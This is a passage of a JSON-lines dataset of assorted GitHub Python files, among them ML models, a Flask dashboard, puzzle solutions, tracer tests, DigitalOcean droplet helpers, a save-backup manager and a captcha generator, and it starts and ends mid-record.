  nn.Dropout(0.2), \n            nn.ReLU(),\n            nn.MaxPool2d(2) \n        )\n        \n        self.fc1 = nn.Sequential(\n            nn.Linear(1152, 1024),\n            nn.Dropout(0.2), \n            nn.ReLU()\n        )\n\n        self.fc2 = nn.Linear(1024, 10)\n\n    def forward(self, x):\n        x = self.layer1(x)\n        x = self.layer2(x)\n        x = self.layer3(x)\n#         x = self.layer4(x)\n        x = x.view(x.size(0), -1)\n        x = self.fc1(x)\n        x = self.fc2(x)\n        return x\n    \n","repo_name":"Karenou/DataMining","sub_path":"digit_classification/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22903037423","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# 1.Scipy:\n# We have the min and max temperatures in a city in India for each month of the year.\n# We would like to find a function to describe this and show it graphically, the dataset\n# given below.\n# Task:\n# 1. fit it to the periodic function\n# 2. plot the fit\n# Data\n# Max = 39, 41, 43, 47, 49, 51, 45, 38, 37, 29, 27, 25\n# Min = 21, 23, 27, 28, 32, 35, 31, 28, 21, 19, 17, 18\n\n# In[8]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import optimize\n\n\n# In[3]:\n\n\ntemp_max = np.array([39, 41, 43, 47, 49, 51, 45, 38, 37, 29, 27, 25])\ntemp_min = np.array([21, 23, 27, 
28, 32, 35, 31, 28, 21, 19, 17, 18])\n\nimport matplotlib.pyplot as plt\nmonths = np.arange(12)\nplt.plot(months, temp_max, 'ro')\nplt.plot(months, temp_min, 'bo')\nplt.xlabel('Month')\nplt.ylabel('Min and max temperature')\n\n\n# In[5]:\n\n\ndef yearly_temps(times, avg, ampl, time_offset):\n return (avg\n + ampl * np.cos((times + time_offset) * 2 * np.pi / times.max()))\n\nres_max, cov_max = optimize.curve_fit(yearly_temps, months,\n temp_max, [20, 10, 0])\nres_min, cov_min = optimize.curve_fit(yearly_temps, months,\n temp_min, [-40, 20, 0])\n\n\n# In[6]:\n\n\ndays = np.linspace(0, 12, num=365)\n\nplt.figure()\nplt.plot(months, temp_max, 'ro')\nplt.plot(days, yearly_temps(days, *res_max), 'r-')\nplt.plot(months, temp_min, 'bo')\nplt.plot(days, yearly_temps(days, *res_min), 'b-')\nplt.xlabel('Month')\nplt.ylabel('Temperature ($^\\circ$C)')\n\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# 2.Matplotlib:\n# This assignment is for visualization using matplotlib:\n# data to use:\n# url=https://raw.githubusercontent.com/Geoyi/Cleaning-Titanic-Data/master/titanic_original.csv\n# titanic = pd.read_csv(url)\n# Charts to plot:\n# 1. Create a pie chart presenting the male/female proportion\n# 2. Create a scatterplot with the Fare paid and the Age, differ the plot color by gender\n\n# In[10]:\n\n\ndata = pd.read_csv('https://raw.githubusercontent.com/Geoyi/Cleaning-Titanic-Data/master/titanic_original.csv')\ndata.head(5)\n\n\n# In[11]:\n\n\n#a. Create a pie chart presenting the male/female proportion\ns=round((data['sex'].value_counts())/len(data)*100,2)\npd.DataFrame(s)\n\n\n# In[12]:\n\n\nlabels = ['male','female']\nsizes = data.sex.value_counts()\nfig1, ax1 = plt.subplots()\nax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, colors = ['Green'\n,'Red'])\n#ax1.axis('equal')\nplt.show()\n\n\n# In[15]:\n\n\n# b. 
Create a scatterplot with the Fare paid and the Age, differ the plot color by gender\nplt.figure()\ncategory1 = data[data.sex=='male'].plot.scatter('age', 'fare', color='blue',label='male')\ndata[data.sex=='female'].plot.scatter('age', 'fare',color='red',label='female',ax=category1)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"alexpanackal333/Machine-Learning","sub_path":"Matplotlib Assignment.py","file_name":"Matplotlib Assignment.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22825369053","text":"from flask import Blueprint, render_template, request, redirect, url_for\r\nfrom flask_login import current_user, login_required\r\n\r\nfrom poodtam import models\r\nfrom chatbot import chat_answer\r\nfrom chatbot import TYPE_CORPUS as RESTAURANT_TYPE\r\nfrom chatbot.dataset import EXAMPLE_SENTENCE\r\n\r\nimport random\r\nimport datetime\r\nimport time\r\nimport pandas as pd\r\nimport io\r\n\r\nmodule = Blueprint(\"dashboard\", __name__, url_prefix=\"/\")\r\n\r\n\r\ndef is_openning(opened_time, closed_time):\r\n    now_time = datetime.datetime.now().time()\r\n    if now_time > opened_time.time() and now_time < closed_time.time():\r\n        return True\r\n    return False\r\n\r\n@module.route(\"/\", methods=[\"GET\"])\r\n@login_required\r\ndef index():\r\n    user = current_user._get_current_object()\r\n    chats = models.Chat.objects(user=user).order_by(\"-created_date\")\r\n\r\n    chat_id = request.args.get(\"chat_id\", None)\r\n    chat = models.Chat.objects(user=user).first()\r\n    if chat_id:\r\n        chat = models.Chat.objects.get(id=chat_id)\r\n    \r\n    if not chat:\r\n        chat = models.Chat()\r\n        chat.user = user\r\n        chat.name = f\"Chat {models.Chat.objects().count() + 1}\"\r\n        chat.create_bot_message(\"text\", \"Ask me...\")\r\n        chat.save()\r\n    return render_template(\r\n        \"/dashboard/index.html\",\r\n        chat=chat,\r\n        chats=chats,\r\n        is_openning=is_openning,\r\n        RESTAURANT_TYPE=RESTAURANT_TYPE,\r\n    )\r\n\r\n@module.route(\"/submit_message/<chat_id>\", methods=[\"GET\"])\r\ndef submit_message(chat_id):\r\n    chat = models.Chat.objects.get(id=chat_id)\r\n    input = request.args.get(\"input\", None)\r\n    if input:\r\n        chat.create_user_message(\"text\", input)\r\n        chat_answer(chat, input)\r\n    return redirect(url_for('dashboard.index', chat_id=chat.id))\r\n\r\n@module.route(\"/random_sentence\")\r\ndef random_sentence():\r\n    sentence = random.choice(EXAMPLE_SENTENCE)\r\n    return sentence","repo_name":"alkaline1024/poodtam","sub_path":"poodtam/web/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28756356434","text":"# -*- coding: utf-8 -*-\nimport os\nimport random\n\nfrom chainer.dataset import DatasetMixin\nimport numpy as np\nfrom scipy.misc import imresize\n\n\ncode_dir = os.path.split(__file__)[0]\ndata_dir = os.path.abspath(os.path.join(code_dir, '..', 'data'))\nmean_image_path = os.path.join(data_dir, 'ilsvrc_2012_mean.npy')\n\n\ndef resize(img, size=256):\n    \"\"\"Resize image\"\"\"\n    img = img.transpose(1, 2, 0) # (C, H, W) => (H, W, C)\n    img = imresize(img, (size, size))\n    img = img.transpose(2, 0, 1) # (H, W, C) => (C, H, W)\n    img = img.astype(np.float32)\n\n    return img\n\n\ndef random_crop(img, crop_size=227):\n    \"\"\"Crop image randomly\"\"\"\n    w, h = img.shape[2], img.shape[1]\n\n    x0 = random.randint(0, w - crop_size)\n    y0 = random.randint(0, h - crop_size)\n    img = img[:, y0: y0 + 
crop_size, x0: x0 + crop_size]\n\n    return img\n\n\ndef crop_center(img, crop_size=227):\n    \"\"\"Crop center of given image\"\"\"\n    w, h = img.shape[2], img.shape[1]\n\n    x0 = int((w - crop_size) / 2.)\n    y0 = int((h - crop_size) / 2.)\n    img = img[:, y0: y0 + crop_size, x0: x0 + crop_size]\n\n    return img\n\n\nclass CIFAR10Dataset(DatasetMixin):\n    \"\"\"CIFAR10 dataset for SSDH training\"\"\"\n\n    def __init__(self, dataset, random=False):\n        self._dataset = dataset\n        self._random = random\n\n        mean = np.load(mean_image_path).astype(np.float32)\n        self._mean = mean\n\n    def __len__(self):\n        return len(self._dataset)\n\n    def get_example(self, i):\n        img, label = self._dataset[i]\n\n        # preprocess\n        img = resize(img)\n        img = img - self._mean\n        if self._random:\n            img = random_crop(img)\n            if random.random() > 0.5:\n                img = img[:, :, ::-1] # flip horizontal\n        else:\n            img = crop_center(img)\n\n        return img, label\n","repo_name":"t-hanya/chainer-SSDH","sub_path":"code/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"13032814168","text":"# order = [1,2,3]\norder = [6,13,1,15,2,0]\nwhenSaid = {}\nfor i in range(len(order)):\n    whenSaid[order[i]] = [i]\n\nfor i in range(30000000-len(order)):\n    last = order[len(order)-1]\n    if len(whenSaid[last]) == 1:\n        order.append(0)\n        if 0 not in whenSaid:\n            whenSaid[0] = []\n        whenSaid[0].append(len(order)-1)\n    else:\n        number = whenSaid[last][-1] - whenSaid[last][-2]\n        order.append(number)\n        if(number not in whenSaid):\n            whenSaid[number] = []\n        whenSaid[number].append(len(order)-1)\nprint(order[-1])\n#print(len(order))\n    \n\n\n","repo_name":"davidcbc/aoc","sub_path":"2020/python/day15-1.py","file_name":"day15-1.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26010530869","text":"# PROJECT EULER PROBLEM 111 - Primes With Runs\nfrom primeCheck import isPrime\nfrom collections import Counter\n\nnumbers = [x for x in range(0,10)]\n\ndef bitList(x,n):\n    # NOTE: The additional -1 in the range is to omit masks with all 1s\n    for i in range(1,(2<<(x-1))-1):\n        out = str(bin(i)).lstrip(\"0b\")\n        while len(out) < x:\n            out = \"0\"+out\n        out = list(out)\n        if Counter(out)['0'] == n:\n            yield(out)\n\nprime_dict = {}\nresult = 0\nfor i in range(0,10):\n    for n in range(9,1,-1):\n        prime_list = []\n        for bits in bitList(10,n):\n            if ((i%2==0) or (i==5)) and (bits[len(bits)-1]=='0'):\n                continue\n            if (i==0 and bits[0]=='0'):\n                continue\n            for j in range(0,10**(10-n)):\n                #print(n,i,j)\n                if ((j%2==0) or (j==5)) and (bits[len(bits)-1]=='1'):\n                    continue\n                J = str(j)\n                while len(J) < (10-n):\n                    J = '0'+J\n                skip_j = False\n                for jj in range(len(J)):\n                    if int(J[jj]) == i:\n                        skip_j = True\n                        break\n                if skip_j:\n                    continue\n                if (J[0]=='0' and bits[0]=='1'):\n                    continue\n                out_str = ''\n                for bit in bits:\n                    if bit == '0':\n                        out_str += str(i)\n                    else:\n                        out_str += J[0:1]\n                        J = J[1:]\n                out_val = int(out_str)\n                if isPrime(out_val):\n                    print(out_val)\n                    prime_list.append(out_val)\n                    result += out_val\n        if len(prime_list) != 0:\n            break\n        prime_dict[i] = prime_list\nprint(result)\n","repo_name":"randolchance/PythonProjects","sub_path":"ProjectEulerSolutions/PE111/PE111-PrimesWithRuns.py","file_name":"PE111-PrimesWithRuns.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"41714645891","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n    path('', news_list, name='news_list_url'),\n    path('search/', search_view, name='search_view_url'),\n    path('post/create/', PostCreate.as_view(), name='post_create_url'),\n    path('post/<str:slug>/', post_detail, name='post_detail_url'),\n    path('post/<str:slug>/update/', PostUpdate.as_view(), name='post_update_url'),\n    path('post/<str:slug>/delete/', PostDelete.as_view(), name='post_delete_url'),\n    path('tag/create/', TagCreate.as_view(), name='tag_create_url'),\n    path('tag/<str:slug>/', tag_detail, name='tag_detail_url'),\n    path('tag/<str:slug>/update/', TagUpdate.as_view(), name='tag_update_url'),\n    path('tag/<str:slug>/delete/', TagDelete.as_view(), name='tag_delete_url'),\n]\n","repo_name":"suprenum/itae","sub_path":"feed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5361490998","text":"\"\"\"\ntag: tree; binary tree; depth-first search; breadth-first search; recursion\nJian Zhi Offer 26. Substructure of a tree\nhttps://leetcode.cn/problems/shu-de-zi-jie-gou-lcof/?favorite=xb9nqhhg\n\"\"\"\nfrom collections import deque\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\n\nclass Solution0:\n    \"\"\" Level-order traversal nested with depth-first traversal:\n    traverse A level by level, and whenever a node's val equals the val of B's root,\n    run a depth-first comparison of the subtree against B \"\"\"\n\n    def isSubStructure(self, A: 'TreeNode', B: 'TreeNode') -> bool:\n        if not B or not A:\n            return False\n\n        def dfs(node_A, node_B):\n            node_A_left, node_A_right = node_A.left, node_A.right\n            node_B_left, node_B_right = node_B.left, node_B.right\n\n            if node_B_left and (\n                    not node_A_left or node_A_left.val != node_B_left.val) \\\n                    or node_B_right and (\n                    not node_A_right or node_A_right.val != node_B_right.val):\n                return False\n            else:\n                if not node_B_left:\n                    flag_left = True\n                else:\n                    flag_left = dfs(node_A_left, node_B_left)\n                if not node_B_right:\n                    flag_right = True\n                else:\n                    flag_right = dfs(node_A_right, node_B_right)\n                return flag_left and flag_right\n\n        root_B = B.val\n        cur_A = A\n        queue = deque([cur_A])\n        while queue:\n            node = queue.popleft()\n            left_node = node.left\n            if left_node:\n                queue.append(left_node)\n            right_node = node.right\n            if right_node:\n                queue.append(right_node)\n            if node.val == root_B:\n                if dfs(node, B):\n                    return True\n        return False\n\n\nclass Solution1:\n    \"\"\" More concise code: pre-order traversal \"\"\"\n    def isSubStructure(self, A: 'TreeNode', B: 'TreeNode') -> bool:\n        def recur(A, B):\n            if not B:\n                return True\n            if not A or A.val != B.val:\n                return False\n            return recur(A.left, B.left) and recur(A.right, B.right)\n\n        return bool(A and B) and (\n            recur(A, B) or self.isSubStructure(A.left, B)\n            or self.isSubStructure(A.right, B)\n        )\n","repo_name":"ZhangRui111/AwesomeAlgorithm","sub_path":"JZOffer/medium/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31034921030","text":"import random\n \ndef random_header(cookies, user_agents):\n    \"\"\"\n    Build a randomized request header\n    :return: headers\n    \"\"\"\n    headers = {'Referer': 'https://www.zhipin.com/c101020100/?ka=sel-city-101020100'}\n    headers['cookie'] = random.choice(cookies)\n    headers['user-agent'] = random.choice(user_agents)\n    return headers\n\n\n# sample pools for a quick manual check; a real spider supplies its own lists\nrandom_header(cookies=['sessionid=example'], user_agents=['Mozilla/5.0'])","repo_name":"tear-0/pypyyy","sub_path":"爬虫案例/null.py","file_name":"null.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"27482714061","text":"from sys import platform\nimport imgui\nimport easygui\nimport shutil\nimport os\nimport zipfile\nimport time\nfrom components.util import LogLevel, Logger\n\nfrom settings import Settings\n\nclass DataManager:\n logger = Logger(\"DataManager\", LogLevel.DEBUG, \"latest.log\")\n logger.info(\"Loading settings\")\n\n settings = Settings(\"settings.properties\")\n data_saves = settings.get(\"data_saves\", [\"Default\"])\n current_data_save = settings.get(\"data_save\", 0)\n\n backup_folders = {\"files\": False}\n chosen_backup = 0\n save_dir = \"\"\n\n def __init__(self, parent) -> None:\n self.logger.info(\"Loading data manager\")\n self.parent = parent\n self.save_dir = self.get_save_dir()\n self.logger.info(\"Done\")\n if not os.path.exists(\"backups\"):\n os.mkdir(\"backups\")\n\n def render(self):\n imgui.begin(\"Data manager\")\n imgui.text(\"Data folders\")\n if imgui.button(\"Create data folder\"):\n self.data_saves.append(easygui.diropenbox(\"Select new save folder\"))\n if self.data_saves[self.current_data_save] != \"Default\":\n imgui.same_line()\n if imgui.button(\"Delete data folder\"):\n self.logger.info(\"Delete data folder?\")\n res = easygui.buttonbox(f\"Are you sure you want to delete this save data directory ({self.data_saves[self.current_data_save]})? You can also just remove it from the list, and re-add it later using the 'Create' button.\", \"Delete save data directory\", (\"Delete\", \"Remove\", \"Cancel\"))\n if res != \"Cancel\":\n self.logger.info(\"Yes\")\n if res == \"Delete\":\n self.logger.debug(\"Deleting\")\n shutil.rmtree(self.data_saves[self.current_data_save])\n self.data_saves.remove(self.data_saves[self.current_data_save])\n self.current_data_save = 0\n self.save_dir = self.get_save_dir()\n c, self.current_data_save = imgui.combo(\"Current data folder\", self.current_data_save, self.data_saves)\n if c:\n self.save_dir = self.get_save_dir()\n imgui.text(\"Data backups\")\n show, _ = imgui.collapsing_header(\"Create a backup\")\n if show:\n dir = self.save_dir\n for folder in os.listdir(dir):\n if os.path.isdir(f\"{dir}/{folder}\"):\n if not folder in self.backup_folders.keys():\n self.backup_folders[folder] = False\n _, self.backup_folders[folder] = imgui.checkbox(folder, self.backup_folders[folder])\n _, self.backup_folders[\"files\"] = imgui.checkbox(\"Files\", self.backup_folders[\"files\"])\n if imgui.button(\"Create backup\"):\n self.logger.info(\"Creating backup\")\n t = time.asctime().replace(\":\", \".\")\n if not os.path.exists(f\"backups\"):\n os.makedirs(\"backups\")\n with zipfile.ZipFile(f\"backups/{t}.zip\", mode='w') as zip_file:\n save_dir = self.get_save_dir()\n len_dir_path = len(save_dir)\n for file in os.listdir(save_dir):\n if os.path.isdir(f\"{save_dir}/{file}\") and self.backup_folders[file]:\n self.logger.debug(f\"Backup dir : {save_dir}/{file}\")\n self.zip_dir(f\"{save_dir}/{file}\", zip_file, len_dir_path)\n if self.backup_folders[\"files\"] and not os.path.isdir(f\"{save_dir}/{file}\"):\n self.logger.debug(f\"Backup file: {save_dir}/{file}\")\n file_path = os.path.join(save_dir, file)\n zip_file.write(file_path, file_path[len_dir_path:])\n\n show, _ = imgui.collapsing_header(\"Backups\")\n if show: \n backups = []\n for file in os.listdir(\"backups\"):\n backups.append(file)\n _, self.chosen_backup = imgui.combo(\"Backup\", self.chosen_backup, backups)\n #if imgui.button(\"Load backup\"):\n # TODO load\n #imgui.same_line()\n if imgui.button(\"Delete backup\"):\n self.logger.info(\"Delete 
backup?\")\n            if easygui.ynbox(f\"Delete {backups[self.chosen_backup]}\", \"Confirm backup deletion\"):\n                self.logger.info(\"Yes\")\n                os.remove(f\"backups/{backups[self.chosen_backup]}\")\n                self.chosen_backup = 0\n        imgui.end()\n\n    def zip_dir(self, path, zip_file, len_dir_path):\n        self.logger.info(f\"Zipping {path} to {zip_file.filename}\")\n        try:\n            for file in os.listdir(path):\n                zip_file.write(path+\"/\"+file, path[len_dir_path:]+\"/\"+file)\n        except Exception as err:\n            self.logger.error(\"Error while zipping dir: \" + str(err))\n            raise err\n\n    def get_save_dir(self):\n        self.logger.info(\"Getting save dir\")\n        dir = self.data_saves[self.current_data_save]\n        try:\n            if dir == \"Default\":\n                self.logger.debug(\"Getting default dir\")\n                if platform == \"linux\" or platform == \"linux2\":\n                    self.logger.debug(\"Detected linux\")\n                    if os.getenv(\"XDG_DATA_HOME\") != None:\n                        dir = os.getenv(\"XDG_DATA_HOME\")\n                        if not dir.endswith(\"/\"): dir += \"/\"\n                        dir = dir + \"Mindustry/\"\n                    else:\n                        dir = os.path.expanduser(\"~\") + \"/.local/share/Mindustry/\"\n                elif platform == \"win32\":\n                    self.logger.debug(\"Detected windows\")\n                    dir = os.getenv(\"AppData\") + \"/Mindustry\"\n            self.logger.info(f\"Got dir: {dir}\")\n            return dir\n        except Exception as err:\n            self.logger.error(\"Error getting save dir: \" + str(err))\n            raise err\n\n    def save_settings(self):\n        self.logger.info(\"Saving settings\")\n        try:\n            self.settings.set(\"data_saves\", self.data_saves)\n            self.settings.set(\"data_save\", self.current_data_save)\n        except Exception as err:\n            self.logger.error(\"Error saving settings: \" + str(err))\n            raise err","repo_name":"GaviTSRA/MindustryLauncher","sub_path":"components/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25754117379","text":"import time\nimport mock\nfrom thundra.opentracing.tracer import ThundraTracer\n\n\ndef test_set_operation_name():\n    tracer = ThundraTracer.get_instance()\n    with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n        span = scope.span\n        assert span.operation_name == 'operation name'\n\n        span.set_operation_name('second operation name')\n        assert span.operation_name == 'second operation name'\n\n\ndef test_tag():\n    tracer = ThundraTracer.get_instance()\n    with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n        span = scope.span\n        assert bool(span.tags) == False\n\n        span.set_tag('tag', 'test')\n        tag = span.get_tag('tag')\n        assert tag == 'test'\n\n\n@mock.patch('thundra.opentracing.recorder.ThundraRecorder')\ndef test_finish(mock_recorder):\n    tracer = ThundraTracer.get_instance()\n    with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n        span = scope.span\n        assert span.finish_time == 0\n\n        end_time = time.time()\n        span.finish(f_time=end_time)\n\n        duration = end_time - span.start_time\n        assert span.get_duration() == duration\n\n        mock_recorder.record.assert_called_once()\n\n\ndef test_log_kv():\n    tracer = ThundraTracer.get_instance()\n    with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n        span = scope.span\n        assert len(span.logs) == 0\n\n        t = time.time()\n        span.log_kv({\n            'log1': 'log',\n            'log2': 2,\n        }, t)\n        span.finish()\n\n        assert len(span.logs) == 1\n        log = span.logs[0]\n        assert log['timestamp'] == t\n\n        assert log['log1'] == 'log'\n        assert log['log2'] == 2\n\n\ndef 
test_baggage_item():\n tracer = ThundraTracer.get_instance()\n with tracer.start_active_span(operation_name='operation name', finish_on_close=True) as scope:\n span = scope.span\n assert bool(span.context.baggage) == False\n\n span.set_baggage_item('baggage', 'item')\n assert span.get_baggage_item('baggage') == 'item'\n span.finish()\n","repo_name":"thundra-io/thundra-agent-python","sub_path":"tests/opentracing/test_span.py","file_name":"test_span.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"35275022612","text":"import json\nfrom pprint import pprint\nfrom typing import List, Union\n\nfrom sshpubkeys import SSHKey as SSHPubKey\nfrom digitalocean import SSHKey, Manager, Droplet\n\nfrom beauty_ocean.core import config, helpers\nfrom beauty_ocean.droplet import api\nfrom beauty_ocean.droplet import questions\n\n\ndef validate_public_key(path: str) -> Union[str, None]:\n \"\"\"\n :param str path: path to the public key\n :return: str or None\n \"\"\"\n pub_key = helpers.read_path(path)\n ssh = SSHPubKey(pub_key, strict=True)\n if ssh.parse() is None:\n return pub_key\n\n\ndef post_public_key(token: str, public_key: str) -> List[SSHKey]:\n \"\"\"\n Given the API token and the public key, posts the public key to\n the account.\n\n :param str token: the API token\n :param str public_key: the public key\n :return: a list of one element digitalocean.SSHKey\n \"\"\"\n name = questions.ask_for_public_key_name()\n ssh_key = SSHKey(token=token, name=name, public_key=public_key)\n\n # Post the ssh key to DO in order to get an ssh key id\n ssh_key = api.create_ssh_key(ssh_key)\n return [ssh_key]\n\n\ndef handle_ssh_keys(manager: Manager, addition_method: str) -> list:\n \"\"\"\n Post local public key to DO account or select one or more ssh keys\n that are already present on DO account.\n\n :param digitalocean.Manager.Manager manager: instance\n :param str addition_method: the chosen addition method (remote|local)\n :return: list (of zero or more digitalocean.SSHKey.SSHKey instances)\n \"\"\"\n msg = \"Enter the path to your public key\"\n if addition_method == \"remote\": # go get remote ssh keys\n remote_ssh_keys = questions.ask_for_remote_ssh_keys_selection(manager)\n if remote_ssh_keys:\n return remote_ssh_keys\n else:\n msg = f\"No ssh keys selected or found on DO! {msg}\"\n path = questions.ask_for_public_key_path(msg)\n public_key = validate_public_key(path)\n if public_key:\n return post_public_key(manager.token, public_key)\n return []\n\n\ndef handle_tag_selection(manager: Manager, both: bool = False) -> list:\n \"\"\"\n Handles tag selection\n\n :param digitalocean.Manager.Manager manager: instance\n :param boolean both: whether or not both remote + new tags to be added\n :return: list (of zero or more strings)\n \"\"\"\n tags = questions.ask_for_remote_tag_selection(manager)\n if not tags:\n message = (\n f\"No remote tags found {config.SORRY}! 
{questions.NEW_TAG_MSG}\"\n )\n return questions.ask_for_new_tag(message=message)\n if both:\n tags += questions.ask_for_new_tag()\n return tags\n\n\ndef handle_tags(manager, addition_method: str) -> list:\n \"\"\"\n Given an addition method, adds corresponding tag(s).\n\n :param digitalocean.Manager.Manager manager: instance\n :param str addition_method: the tag addition method\n :return: list (of zero or more strings)\n \"\"\"\n if addition_method == \"remote\":\n return handle_tag_selection(manager)\n elif addition_method == \"new\":\n return questions.ask_for_new_tag()\n else: # some/all remote and some new tags will be added\n return handle_tag_selection(manager, both=True)\n\n\ndef padding_text(s: str, length: int=60, pad: str=\"-\") -> str:\n \"\"\"\n Centers the given str between a padding form (total length is \"length\").\n Example (str = \"Hello\", length=11, pad=\"+\"):\n +++HELLO+++\n :param str s: the string to center\n :param int length: number of characters (incl. pad)\n :param str pad: the padding character\n :return: str\n \"\"\"\n return f\"\\n{s.upper().center(length, pad)}\\n\"\n\n\ndef review_droplet_data(data: dict) -> None:\n \"\"\"\n Pretty print the data dictionary that contains droplet's configuration.\n\n :param dict data: droplet data to be submitted\n :return: None\n \"\"\"\n exclude = \"token\"\n to_review = {k: v for k, v in data.items() if k != exclude}\n print(config.cyan_text(padding_text(\"Droplet configuration\")))\n pprint(to_review, indent=4, width=10)\n print(config.cyan_text(padding_text(\"End droplet configuration\")))\n\n\ndef create_droplet_now(droplet_params) -> Droplet:\n \"\"\"\n Given some droplet parameters, make an API call in order to create\n the Droplet.\n\n :param dict droplet_params: droplet (selected) parameters\n :return: digitalocean.Droplet instance\n \"\"\"\n # create a Droplet instance\n bare_droplet = Droplet(**droplet_params)\n\n # initialize it (to get the id)\n pre_droplet = api.boot_droplet(bare_droplet)\n\n # poll it in order to know when it'll be ready-to-go\n print(config.green_text(\"Droplet initialized! Booting...\"))\n droplet = api.poll_droplet(pre_droplet)\n print(config.green_text(\"Droplet has been created successfully! \\(´▽`)/\"))\n return droplet\n\n\ndef filter_droplet_return_data(droplet: Droplet) -> dict:\n \"\"\"\n Creates a new dict that contains valuable data from the newly created\n Droplet. 
Discards sensitive data such as \"token\" and any logs.\n\n    :param digitalocean.Droplet.Droplet droplet: instance\n    :return: dict\n    \"\"\"\n    to_return = {}\n    black_list = [\"token\", \"_log\", \"_session\"]\n    for key, value in vars(droplet).items():\n        if key in black_list:\n            continue\n        elif key == \"ssh_keys\":\n            to_return[\"ssh_keys\"] = [key.name for key in value]\n        else:\n            to_return[key] = value\n    return to_return\n\n\ndef droplet_data_json(droplet: Droplet) -> str:\n    \"\"\"\n    Return a JSON representation of a (properly formatted) droplet.\n\n    :param digitalocean.Droplet.Droplet droplet: instance\n    :return: str (json)\n    \"\"\"\n    to_return = filter_droplet_return_data(droplet)\n    return json.dumps(to_return)\n","repo_name":"manikos/beauty-ocean","sub_path":"beauty_ocean/droplet/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6052178082","text":"import functools\n\nimport imlib as im\nimport numpy as np\nimport pylib as py\nimport tensorflow as tf\nimport tensorflow.keras as keras\n#import tf2lib as tl\n#import tf2gan as gan\nimport tqdm\n\n#import data\nimport module\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n# Shared network parameters\ndim = 64 #number of filters\nnorm = 'none' #choices=['none','batch_norm','instance_norm','layer_norm']\nlr=0.0002\nbeta_1=0.5\nadversarial_loss_mode='lsgan' #choices=['gan', 'hinge_v1', 'hinge_v2', 'lsgan', 'wgan'])\ngradient_penalty_mode='none' #choices=['none', 'dragan', 'wgan-gp'])\ngradient_penalty_weight=10.0\ncycle_loss_weight=11.0\nidentity_loss_weight=0.0\npool_size = 50\n\n# Generator parameters\ng_downsamples = 1 #number of convolutions\nn_blocks = 6 #number of residual blocks\n\nGenerator = module.ResnetGenerator(input_shape=(128, 128, 1),\n                                   output_channels=1,\n                                   dim=64,\n                                   n_downsamplings=1,\n                                   n_blocks=6,\n                                   norm='none')\n\nsave_dir = 'C:/Users/mam-pm/PycharmProjects/cyclegan_depthmaps_tensorflow/venv/'\nsave_name = \"CycleGAN_RL_21-09-16/\"\n\nGenerator.load_weights(save_dir + save_name + 'cycle_gan_RL_sim_to_real_weights.h5')\n\nimage = cv2.imread('C:/Users/mam-pm/Desktop/100 depthmaps_validierung_sim_grey_100/test.png', cv2.IMREAD_GRAYSCALE)\nimage = np.array(image).reshape(-1, 128, 128, 1)\nimage = image / 255.0\n#print(os.path.join(savedir, category, i))\ny = Generator.predict(image)\ny = y.reshape(128, 128)\ny += 1\ny = y * 255 / 2\nprint(y.shape, y.min(), y.max())\nplt.imsave('image_new.jpg',y, cmap='gray')\n","repo_name":"phmelzer/tensorflow-cyclegan","sub_path":"test_image.py","file_name":"test_image.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34145160738","text":"# coding:utf-8\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom captcha.image import ImageCaptcha\n\n\nNUMBER = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nLOW_CASE = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',\n            'v', 'w', 'x', 'y', 'z']\nUP_CASE = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U',\n           'V', 'W', 'X', 'Y', 